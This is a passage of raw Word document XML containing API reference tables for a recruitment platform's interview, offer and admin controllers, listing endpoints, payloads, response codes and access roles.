              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PUT /api/profiles/me</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CandidateProfileDto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / CandidateProfileDto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Updates profile metadata and syncs skills in profile_skills join table.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Controller: InterviewController.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Architecture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Base URI Mapping: /api/interviews | Primary Domain: Technical Interview Coordination</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Injected Dependencies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>InterviewService, ApplicationService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2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTTP Method &amp; Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Request Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Response Code / DTO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Access Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Execution Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /api/interviews/schedule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>InterviewScheduleDto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>201 Created / InterviewDto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Schedules technical round, generates meeting URL (Google Meet / Teams), sets application stage to INTERVIEW_SCHEDULED, alerts candidate.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /api/interviews/upcoming</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / List&lt;InterviewDto&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate / Recruiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Retrieves upcoming interview sessions filtered by the current user's identity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Controller: OfferController.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Architecture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Base URI Mapping: /api/offers | Primary Domain: Formal Compensation &amp; Acceptance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Injected Dependencies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>OfferService, ApplicationService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2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTTP Method &amp; Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Request Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Response Code / DTO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Access Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Execution Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /api/offers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OfferRequestDto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>201 Created / OfferDto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Generates formal job offer with base salary, joining date, and terms. Advances application stage to OFFER_SENT.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PUT /api/offers/{id}/respond</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Path: id, { status: ACCEPTED/DECLINED }</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK / OfferDto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Records candidate offer decision. If accepted, marks application as HIRED.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Controller: AdminController.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Architecture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Base URI Mapping: /api/admin | Primary Domain: Superuser Platform Governance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Injected Dependencies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>AdminService, UserService, JobService, AuditLogService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2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTTP Method &amp; Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Request Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Response Code / DTO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
